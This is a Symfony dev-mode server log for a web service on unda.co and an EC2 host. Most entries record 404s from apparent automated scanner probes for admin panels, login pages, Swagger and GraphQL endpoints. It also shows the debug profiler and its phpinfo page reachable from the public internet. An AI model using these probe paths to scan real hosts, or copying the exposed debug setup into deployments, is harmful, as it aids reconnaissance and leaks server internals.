  5238. [2025-12-19 09:31:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pom.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pom.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5239. [2025-12-19 09:31:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webportal.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webportal.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5240. [2025-12-19 09:31:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /build.gradle"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /build.gradle\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5241. [2025-12-19 09:31:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /workplace/home.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /workplace/home.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5242. [2025-12-19 09:31:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cgi-bin/authLogin.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cgi-bin/authLogin.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5243. [2025-12-19 09:31:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pandora_console/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pandora_console/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5244. [2025-12-19 09:31:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /centreon/api/latest/platform/versions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /centreon/api/latest/platform/versions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5245. [2025-12-19 09:31:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v3/meta"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v3/meta\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5246. [2025-12-19 09:31:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /hx/api/about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /hx/api/about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5247. [2025-12-19 09:31:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /i18n/component/JS"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /i18n/component/JS\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5248. [2025-12-19 09:31:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v1/version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v1/version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5249. [2025-12-19 09:31:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/ui/login.jsp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/ui/login.jsp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5250. [2025-12-19 09:31:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5251. [2025-12-19 09:31:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Main_Login.asp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Main_Login.asp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5252. [2025-12-19 09:31:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.hona.mx/","method":"GET"} []
  5253. [2025-12-19 09:31:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5254. [2025-12-19 09:31:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5255. [2025-12-19 09:31:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5256. [2025-12-19 09:31:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5257. [2025-12-19 09:31:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5258. [2025-12-19 09:31:30] security.DEBUG: Calling Authentication entry point. [] []
  5259. [2025-12-19 09:31:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
  5260. [2025-12-19 09:36:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c0fc3e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c0fc3e","method":"GET"} []
  5261. [2025-12-19 09:36:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5262. [2025-12-19 09:39:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27124","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27124?panel=request","method":"GET"} []
  5263. [2025-12-19 09:39:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5264. [2025-12-19 09:39:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2","method":"GET"} []
  5265. [2025-12-19 09:39:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5266. [2025-12-19 09:40:11] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  5267. [2025-12-19 09:40:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  5268. [2025-12-19 09:40:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5269. [2025-12-19 09:40:11] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5270. [2025-12-19 09:40:11] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5271. [2025-12-19 09:40:11] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5272. [2025-12-19 09:40:11] security.DEBUG: Calling Authentication entry point. [] []
  5273. [2025-12-19 09:43:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5274. [2025-12-19 09:44:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  5275. [2025-12-19 09:44:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5276. [2025-12-19 09:44:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5277. [2025-12-19 09:44:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5278. [2025-12-19 09:44:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5279. [2025-12-19 09:44:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5280. [2025-12-19 09:44:14] security.DEBUG: Calling Authentication entry point. [] []
  5281. [2025-12-19 09:44:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  5282. [2025-12-19 09:44:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5283. [2025-12-19 09:44:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5284. [2025-12-19 09:44:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5285. [2025-12-19 09:44:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5286. [2025-12-19 09:44:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5287. [2025-12-19 09:44:14] security.DEBUG: Calling Authentication entry point. [] []
  5288. [2025-12-19 09:44:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5289. [2025-12-19 09:44:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5290. [2025-12-19 09:44:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5291. [2025-12-19 09:44:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5292. [2025-12-19 09:44:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5293. [2025-12-19 09:44:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5294. [2025-12-19 09:44:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5295. [2025-12-19 09:44:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5296. [2025-12-19 09:44:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5297. [2025-12-19 09:44:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5298. [2025-12-19 09:44:21] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5299. [2025-12-19 09:44:22] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5300. [2025-12-19 09:44:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5301. [2025-12-19 09:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5302. [2025-12-19 09:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5303. [2025-12-19 09:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5304. [2025-12-19 09:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5305. [2025-12-19 09:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5306. [2025-12-19 09:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5307. [2025-12-19 09:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
